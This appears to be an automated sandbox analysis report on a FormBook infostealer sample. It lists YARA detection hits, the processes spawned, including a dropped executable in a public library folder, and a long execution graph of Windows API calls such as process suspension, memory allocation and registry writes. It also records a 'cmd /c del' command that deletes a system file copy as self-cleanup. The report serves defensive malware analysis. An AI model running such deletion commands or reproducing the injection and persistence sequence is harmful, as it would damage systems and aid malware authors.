                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              Target ID:2
                                                                                              Start time:18:24:05
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                              Imagebase:0x7ff69bc80000
                                                                                              File size:3933184 bytes
                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:high

                                                                                              Target ID:3
                                                                                              Start time:18:24:14
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Users\Public\Libraries\Mwqrxeuz.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\Public\Libraries\Mwqrxeuz.exe"
                                                                                              Imagebase:0x7ff7fcd70000
                                                                                              File size:750592 bytes
                                                                                              MD5 hash:EDB1382C354EC6C09C53473E5335703A
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 36%, ReversingLabs
                                                                                              Reputation:low

                                                                                              Target ID:4
                                                                                              Start time:18:24:18
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\colorcpl.exe
                                                                                              Imagebase:0x1140000
                                                                                              File size:86528 bytes
                                                                                              MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              Target ID:9
                                                                                              Start time:18:25:26
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\SysWOW64\raserver.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                              Imagebase:0x870000
                                                                                              File size:108544 bytes
                                                                                              MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              Target ID:10
                                                                                              Start time:18:25:37
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/c del "C:\Windows\SysWOW64\colorcpl.exe"
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:11
                                                                                              Start time:18:25:38
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7fcd70000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high


                                                                                                Execution Graph

                                                                                                Execution Coverage:18.1%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:30.6%
                                                                                                Total number of Nodes:1641
                                                                                                Total number of Limit Nodes:18
2183690 18 API calls 20363->20364 20365 218b97b 20364->20365 20366 2174c24 11 API calls 20365->20366 20367 218b99b 20366->20367 20368 2174bb0 11 API calls 20367->20368 20369 218b9d0 20368->20369 20370 2183690 18 API calls 20369->20370 20371 218b9f4 20370->20371 20372 2174c24 11 API calls 20371->20372 20373 218ba14 20372->20373 20374 2174bb0 11 API calls 20373->20374 20375 218ba49 20374->20375 20376 2183690 18 API calls 20375->20376 20377 218ba6d 20376->20377 20378 2174c24 11 API calls 20377->20378 20379 218ba8d 20378->20379 20380 2174bb0 11 API calls 20379->20380 20381 218bac2 20380->20381 20382 2183690 18 API calls 20381->20382 20383 218bae6 20382->20383 20808 218888c 20383->20808 20386 21748f4 11 API calls 20387 218bb0c 20386->20387 20388 2174c24 11 API calls 20387->20388 20389 218bb2c 20388->20389 20390 2174bb0 11 API calls 20389->20390 20391 218bb61 20390->20391 20392 2183690 18 API calls 20391->20392 20393 218bb85 20392->20393 20394 2174c24 11 API calls 20393->20394 20395 218bba5 20394->20395 20396 2174bb0 11 API calls 20395->20396 20397 218bbda 20396->20397 20398 2183690 18 API calls 20397->20398 20399 218bbfe 20398->20399 20821 2177d88 20399->20821 20404 21748f4 11 API calls 20405 218bc2a 20404->20405 20406 2174c24 11 API calls 20405->20406 20407 218bc4a 20406->20407 20408 2174bb0 11 API calls 20407->20408 20409 218bc7f 20408->20409 20410 2183690 18 API calls 20409->20410 20411 218bca3 20410->20411 20412 2174c24 11 API calls 20411->20412 20413 218bcc3 20412->20413 20414 2174bb0 11 API calls 20413->20414 20415 218bcf8 20414->20415 20416 2183690 18 API calls 20415->20416 20417 218bd1c 20416->20417 20418 2188e04 11 API calls 20417->20418 20419 218bd2c 20418->20419 20834 2188c58 20419->20834 20422 21748f4 11 API calls 20423 218bd4d 20422->20423 20424 2174c24 11 API calls 20423->20424 20425 218bd6d 20424->20425 20426 2174bb0 11 API calls 20425->20426 20427 218bda2 20426->20427 20428 2183690 18 API calls 20427->20428 20429 218bdc6 20428->20429 20430 2174c24 11 API 
calls 20429->20430 20431 218bde6 20430->20431 20432 2174bb0 11 API calls 20431->20432 20433 218be1b 20432->20433 20434 2183690 18 API calls 20433->20434 20435 218be3f 20434->20435 20436 2174c24 11 API calls 20435->20436 20437 218be5f 20436->20437 20438 2174bb0 11 API calls 20437->20438 20439 218be94 20438->20439 20440 2183690 18 API calls 20439->20440 20442 218beb8 20440->20442 20441 218cdeb 20444 2174c24 11 API calls 20441->20444 20442->20441 20443 2174c24 11 API calls 20442->20443 20446 218beed 20443->20446 20445 218ce0b 20444->20445 20447 2174bb0 11 API calls 20445->20447 20983 21780f8 20446->20983 20449 218ce40 20447->20449 20453 2183690 18 API calls 20449->20453 20450 218bf10 20450->20441 20987 217811c 20450->20987 20455 218ce64 20453->20455 20454 218bf3b 20456 2174c24 11 API calls 20454->20456 20457 2174c24 11 API calls 20455->20457 20459 218bf5b 20456->20459 20458 218ce84 20457->20458 20460 2174bb0 11 API calls 20458->20460 20461 2174bb0 11 API calls 20459->20461 20462 218ceb9 20460->20462 20463 218bf90 20461->20463 20464 2183690 18 API calls 20462->20464 20465 2183690 18 API calls 20463->20465 20473 218cedd 20464->20473 20466 218bfb4 20465->20466 20467 2174c24 11 API calls 20466->20467 20470 218bfd4 20467->20470 20468 218d6fa 20469 2174c24 11 API calls 20468->20469 20472 218d71a 20469->20472 20471 2174bb0 11 API calls 20470->20471 20476 218c009 20471->20476 20474 2174bb0 11 API calls 20472->20474 20473->20468 20475 2174c24 11 API calls 20473->20475 20478 218d74f 20474->20478 20479 218cf3c 20475->20479 20477 2183690 18 API calls 20476->20477 20482 218c02d 20477->20482 20480 2183690 18 API calls 20478->20480 20481 2174bb0 11 API calls 20479->20481 20483 218d773 20480->20483 20487 218cf71 20481->20487 20991 2177c4c 20482->20991 20484 2174c24 11 API calls 20483->20484 20488 218d793 20484->20488 20489 2183690 18 API calls 20487->20489 20493 2174bb0 11 API calls 20488->20493 20490 218cf95 20489->20490 20492 2174c24 11 API calls 20490->20492 20491 2174c24 11 API 
calls 20498 218c092 20491->20498 20495 218cfb5 20492->20495 20494 218d7c8 20493->20494 20496 2183690 18 API calls 20494->20496 20497 2174bb0 11 API calls 20495->20497 20507 218d7ec 20496->20507 20500 218cfea 20497->20500 20499 218d8ef 20501 2174c24 11 API calls 20499->20501 20502 2183690 18 API calls 20500->20502 20505 218d90f 20501->20505 20503 218d00e 20502->20503 20504 2174bb0 11 API calls 20503->20504 20506 218d026 20504->20506 20508 2174bb0 11 API calls 20505->20508 20509 218d031 WinExec Sleep 20506->20509 20507->20499 20510 218d835 InetIsOffline 20507->20510 20517 218d944 20508->20517 20511 2174c24 11 API calls 20509->20511 20512 218d83f 20510->20512 20513 218d850 20510->20513 20518 218d061 20511->20518 20514 21748f4 11 API calls 20512->20514 20515 2174c24 11 API calls 20513->20515 20516 218d84e 20514->20516 20524 218d870 20515->20524 20995 2172fc4 20516->20995 20520 2183690 18 API calls 20517->20520 20523 2174bb0 11 API calls 20518->20523 20522 218d968 20520->20522 20526 2174c24 11 API calls 20522->20526 20530 218d096 20523->20530 20528 2174bb0 11 API calls 20524->20528 20525 2174dbc 11 API calls 20527 218d8e7 20525->20527 20531 218d988 20526->20531 21005 2183990 20527->21005 20532 218d8a5 20528->20532 20533 2183690 18 API calls 20530->20533 20534 2174bb0 11 API calls 20531->20534 20532->20516 20537 2183690 18 API calls 20532->20537 20535 218d0ba 20533->20535 20538 218d9bd 20534->20538 20536 2174c24 11 API calls 20535->20536 20539 218d0da 20536->20539 20537->20516 20540 2183690 18 API calls 20538->20540 20541 2174bb0 11 API calls 20539->20541 20547 218d9e1 20540->20547 20544 218d10f 20541->20544 20542 218dacd 20543 2174c24 11 API calls 20542->20543 20546 218daed 20543->20546 20545 2183690 18 API calls 20544->20545 20549 218d133 20545->20549 20548 2174bb0 11 API calls 20546->20548 20547->20542 20550 218da2a InetIsOffline 20547->20550 20557 218db22 20548->20557 20839 21857d0 20549->20839 20551 218da34 20550->20551 20552 218da45 20550->20552 20555 21748f4 11 
API calls 20551->20555 20554 2174c24 11 API calls 20552->20554 20562 218da65 20554->20562 20558 218da43 20555->20558 20560 2183690 18 API calls 20557->20560 20561 2174dbc 11 API calls 20558->20561 20559 2174c24 11 API calls 20567 218d17a 20559->20567 20563 218db46 20560->20563 20564 218dac8 20561->20564 20568 2174bb0 11 API calls 20562->20568 20565 2174c24 11 API calls 20563->20565 21132 21848a0 20564->21132 20570 218db66 20565->20570 20569 2174bb0 11 API calls 20567->20569 20571 218da9a 20568->20571 20573 218d1af 20569->20573 20572 2174bb0 11 API calls 20570->20572 20571->20558 20574 2183690 18 API calls 20571->20574 20577 218db9b 20572->20577 20575 2183690 18 API calls 20573->20575 20574->20558 20576 218d1d3 20575->20576 20578 2174c24 11 API calls 20576->20578 20579 2183690 18 API calls 20577->20579 20582 218d1f3 20578->20582 20580 218dbbf 20579->20580 20581 2174c24 11 API calls 20580->20581 20584 218dbdf 20581->20584 20583 2174bb0 11 API calls 20582->20583 20586 218d228 20583->20586 20585 2174bb0 11 API calls 20584->20585 20589 218dc14 20585->20589 20587 2183690 18 API calls 20586->20587 20588 218d24c OpenProcess 20587->20588 20590 2174c24 11 API calls 20588->20590 20591 2183690 18 API calls 20589->20591 20592 218d283 20590->20592 20593 218dc38 20591->20593 20594 2174bb0 11 API calls 20592->20594 20595 2183690 18 API calls 20593->20595 20596 218d2b8 20594->20596 20597 218dc6b 20595->20597 20598 2183690 18 API calls 20596->20598 20600 2183690 18 API calls 20597->20600 20599 218d2dc 20598->20599 20601 2174c24 11 API calls 20599->20601 20602 218dc9e 20600->20602 20604 218d2fc 20601->20604 20603 2174c24 11 API calls 20602->20603 20605 218dcbe 20603->20605 20606 2174bb0 11 API calls 20604->20606 20607 2174bb0 11 API calls 20605->20607 20608 218d331 20606->20608 20609 218dcf3 20607->20609 20610 2183690 18 API calls 20608->20610 20612 2183690 18 API calls 20609->20612 20611 218d355 NtSuspendThread 20610->20611 20613 2174c24 11 API calls 20611->20613 20614 218dd17 
20612->20614 20615 218d380 20613->20615 20616 2183690 18 API calls 20614->20616 20617 2174bb0 11 API calls 20615->20617 20618 218dd4a 20616->20618 20619 218d3b5 20617->20619 20620 2183690 18 API calls 20618->20620 20621 2183690 18 API calls 20619->20621 20622 218dd7d 20620->20622 20623 218d3d9 20621->20623 20624 2174c24 11 API calls 20622->20624 20625 2174c24 11 API calls 20623->20625 20626 218dd9d 20624->20626 20627 218d3f9 20625->20627 20628 2174bb0 11 API calls 20626->20628 20629 2174bb0 11 API calls 20627->20629 20630 218ddd2 20628->20630 20631 218d42e 20629->20631 20632 2183690 18 API calls 20630->20632 20633 2183690 18 API calls 20631->20633 20634 218ddf6 20632->20634 20635 218d452 20633->20635 20636 2174c24 11 API calls 20634->20636 20637 2174c24 11 API calls 20635->20637 20638 218de16 20636->20638 20639 218d472 20637->20639 20640 2174bb0 11 API calls 20638->20640 20641 2174bb0 11 API calls 20639->20641 20642 218de4b 20640->20642 20643 218d4a7 20641->20643 20644 2183690 18 API calls 20642->20644 20645 2183690 18 API calls 20643->20645 20646 218de6f 20644->20646 20647 218d4cb 20645->20647 20648 2174c24 11 API calls 20646->20648 20649 218d4d5 InetIsOffline 20647->20649 20654 218de8f 20648->20654 20650 218d4df 20649->20650 20651 218d4f0 20649->20651 20653 21748f4 11 API calls 20650->20653 20652 2174c24 11 API calls 20651->20652 20658 218d510 20652->20658 20655 218d4ee 20653->20655 20656 2174bb0 11 API calls 20654->20656 20657 2174c24 11 API calls 20655->20657 20660 218dec4 20656->20660 20661 218d589 20657->20661 20659 2174bb0 11 API calls 20658->20659 20665 218d545 20659->20665 20662 2183690 18 API calls 20660->20662 20663 2174bb0 11 API calls 20661->20663 20664 218dee8 20662->20664 20668 218d5be 20663->20668 20666 2174c24 11 API calls 20664->20666 20665->20655 20667 2183690 18 API calls 20665->20667 20669 218df08 20666->20669 20667->20655 20670 2183690 18 API calls 20668->20670 20672 2174bb0 11 API calls 20669->20672 20671 218d5e2 20670->20671 20849 2174dbc 
20671->20849 20677 218df3d 20672->20677 20679 2183690 18 API calls 20677->20679 20678 2174c24 11 API calls 20681 218d61d 20678->20681 20680 218df61 20679->20680 20682 218df70 20680->20682 20683 218df81 20680->20683 20684 2174bb0 11 API calls 20681->20684 20685 21748f4 11 API calls 20682->20685 20686 21748f4 11 API calls 20683->20686 20688 218df7f 20683->20688 20687 218d652 20684->20687 20685->20688 20686->20688 20689 2183690 18 API calls 20687->20689 20690 2183690 18 API calls 20688->20690 20691 218d676 ZwClose 20689->20691 20692 218dfc3 20690->20692 20693 2174c24 11 API calls 20691->20693 20694 2174c24 11 API calls 20692->20694 20695 218d6a1 20693->20695 20696 218dfe3 20694->20696 20697 2174bb0 11 API calls 20695->20697 20698 2174bb0 11 API calls 20696->20698 20699 218d6d6 20697->20699 20700 218e018 20698->20700 20701 2183690 18 API calls 20699->20701 20702 2183690 18 API calls 20700->20702 20701->20468 20703 218e03c 20702->20703 20704 2183690 18 API calls 20703->20704 20705 218e06f 20704->20705 20706 2183690 18 API calls 20705->20706 20707 218e0a2 20706->20707 20708 2183690 18 API calls 20707->20708 20709 218e0d5 20708->20709 20710 2174c24 11 API calls 20709->20710 20711 218e0f5 20710->20711 20712 2174bb0 11 API calls 20711->20712 20713 218e12a 20712->20713 20714 2183690 18 API calls 20713->20714 20715 218e14e 20714->20715 20716 2183690 18 API calls 20715->20716 20717 218e188 20716->20717 20718 2183690 18 API calls 20717->20718 20719 218e1c2 20718->20719 20720 2183690 18 API calls 20719->20720 20721 218e1fc 20720->20721 20722 2183690 18 API calls 20721->20722 20723 218e236 20722->20723 20724 2183690 18 API calls 20723->20724 20725 218e270 20724->20725 20726 2183690 18 API calls 20725->20726 20727 218e2aa 20726->20727 20728 2183690 18 API calls 20727->20728 20729 218e2e4 20728->20729 20730 2183690 18 API calls 20729->20730 20731 218e31e 20730->20731 20732 2183690 18 API calls 20731->20732 20733 218e358 20732->20733 20734 2183690 18 API calls 20733->20734 20735 
218e392 20734->20735 20736 2183690 18 API calls 20735->20736 20737 218e3cc 20736->20737 20738 2183690 18 API calls 20737->20738 20739 218e406 20738->20739 20740 2174c24 11 API calls 20739->20740 20741 218e426 20740->20741 20742 2174bb0 11 API calls 20741->20742 20743 218e45b 20742->20743 20744 2183690 18 API calls 20743->20744 20745 218e47f 20744->20745 20746 2183690 18 API calls 20745->20746 20747 218e4b9 20746->20747 20748 2183690 18 API calls 20747->20748 20749 218e4f3 20748->20749 20750 2183690 18 API calls 20749->20750 20751 218e52d 20750->20751 20752 2183690 18 API calls 20751->20752 20753 218e567 20752->20753 20754 2183690 18 API calls 20753->20754 20755 218e5a1 20754->20755 20756 2183690 18 API calls 20755->20756 20757 218e5db 20756->20757 20758 2183690 18 API calls 20757->20758 20759 218e615 ExitProcess 20758->20759 20761 2174bb4 20760->20761 20763 2174c15 20760->20763 20762 2174bbc 20761->20762 20764 21748f4 20761->20764 20762->20763 20766 2174bcb 20762->20766 20767 21748f4 11 API calls 20762->20767 20769 2174964 11 API calls 20764->20769 20770 2174908 20764->20770 20765 2174936 20765->20351 20768 2174964 11 API calls 20766->20768 20767->20766 20772 2174be5 20768->20772 20769->20770 20770->20765 20771 2172c5c 11 API calls 20770->20771 20771->20765 20773 21748f4 11 API calls 20772->20773 20774 2174c11 20773->20774 20774->20351 20776 21836a6 20775->20776 20777 21836c7 LoadLibraryA 20776->20777 20778 218374b 20777->20778 20779 21836d3 GetModuleHandleA 20777->20779 21263 21748c4 20778->21263 20780 2183740 FreeLibrary 20779->20780 20781 21836e7 20779->20781 20780->20778 20784 21836f6 GetProcAddress 20781->20784 20785 2183710 20784->20785 20786 2183712 RtlMoveMemory 20784->20786 20785->20786 21267 217304c 20786->21267 20788 218372d GetCurrentProcess NtFlushVirtualMemory 20788->20780 20789 2188e04 20793 2188e29 20789->20793 20790 2188e55 20792 21748a0 11 API calls 20790->20792 20794 2188e6a 20792->20794 20793->20790 21268 2174a88 20793->21268 21271 2174b6c 
20793->21271 20794->20356 20797 2189023 20796->20797 20798 218904d RegOpenKeyA 20797->20798 20799 218905b 20798->20799 20800 2174dbc 11 API calls 20799->20800 20801 218906b 20800->20801 20802 2189078 RegSetValueExA RegCloseKey 20801->20802 20803 2189098 20802->20803 20804 21748c4 11 API calls 20803->20804 20805 21890a5 20804->20805 20806 21748a0 11 API calls 20805->20806 20807 21890ad 20806->20807 20807->20360 20817 21888ae 20808->20817 20809 2188950 20810 2174f90 11 API calls 20809->20810 20811 2188965 20810->20811 20812 21748f4 11 API calls 20811->20812 20814 2188970 20812->20814 20813 2174a88 11 API calls 20813->20817 20816 21748a0 11 API calls 20814->20816 20815 2174b6c 11 API calls 20815->20817 20818 2188985 20816->20818 20817->20809 20817->20813 20817->20815 20819 21748c4 11 API calls 20818->20819 20820 2188992 20819->20820 20820->20386 20822 2177d98 20821->20822 20823 2177db9 20822->20823 21290 217791c 20822->21290 20825 2188e78 20823->20825 20826 2188e95 20825->20826 20827 2188ef3 20826->20827 20828 2174a88 11 API calls 20826->20828 20831 2174b6c 11 API calls 20826->20831 20829 21748a0 11 API calls 20827->20829 20828->20826 20830 2188f08 20829->20830 20832 21748a0 11 API calls 20830->20832 20831->20826 20833 2188f10 20832->20833 20833->20404 20835 21748f4 11 API calls 20834->20835 20836 2188c6c 20835->20836 20837 2188cb3 20836->20837 20838 2174dbc 11 API calls 20836->20838 20837->20422 20838->20836 21366 2185770 20839->21366 20841 218580d 21371 2185790 20841->21371 20843 21748c4 11 API calls 20844 21858e8 20843->20844 20844->20559 20845 218588b CompareStringA 20846 21858a4 20845->20846 20847 2185828 20845->20847 20846->20843 20847->20845 20847->20846 21376 21857b0 20847->21376 20850 2174d70 20849->20850 20851 2174dab 20850->20851 20852 2174964 11 API calls 20850->20852 20855 218779c 20851->20855 20853 2174d87 20852->20853 20853->20851 20854 2172c5c 11 API calls 20853->20854 20854->20851 20856 21877a5 20855->20856 20857 21877d9 InetIsOffline 20856->20857 
20858 21877f1 20857->20858 20859 21877e3 20857->20859 20861 21877ef 20858->20861 20862 21748f4 11 API calls 20858->20862 20860 21748f4 11 API calls 20859->20860 20860->20861 20863 2174c24 11 API calls 20861->20863 20862->20861 20864 2187816 20863->20864 20865 2174bb0 11 API calls 20864->20865 20866 218783b 20865->20866 20867 2183690 18 API calls 20866->20867 20868 2187856 20867->20868 20869 2174c24 11 API calls 20868->20869 20870 218786f 20869->20870 20871 2174bb0 11 API calls 20870->20871 20872 2187894 20871->20872 20873 2183690 18 API calls 20872->20873 20874 21878af 20873->20874 20875 2174c24 11 API calls 20874->20875 20876 21878c8 20875->20876 20877 2174bb0 11 API calls 20876->20877 20878 21878ed 20877->20878 20879 2183690 18 API calls 20878->20879 20894 2187908 20879->20894 20880 2183690 18 API calls 20881 2187a00 VirtualAlloc 20880->20881 20882 2174c24 11 API calls 20881->20882 20882->20894 20883 2174bb0 11 API calls 20883->20894 20884 2187cc3 20885 2174c24 11 API calls 20884->20885 20886 2187cfa 20885->20886 20887 2174bb0 11 API calls 20886->20887 20888 2187d2b 20887->20888 20890 2183690 18 API calls 20888->20890 20889 2183690 18 API calls 20889->20894 20891 2187d4f 20890->20891 20892 2174c24 11 API calls 20891->20892 20893 2187d6b 20892->20893 20895 2174bb0 11 API calls 20893->20895 20894->20880 20894->20883 20894->20884 20894->20889 20899 2174c24 11 API calls 20894->20899 21385 217cac8 SetErrorMode 20894->21385 20896 2187d9c 20895->20896 20897 2183690 18 API calls 20896->20897 20898 2187dc0 20897->20898 20900 2174c24 11 API calls 20898->20900 20899->20894 20901 2187df7 20900->20901 20902 2174bb0 11 API calls 20901->20902 20903 2187e28 20902->20903 20904 2183690 18 API 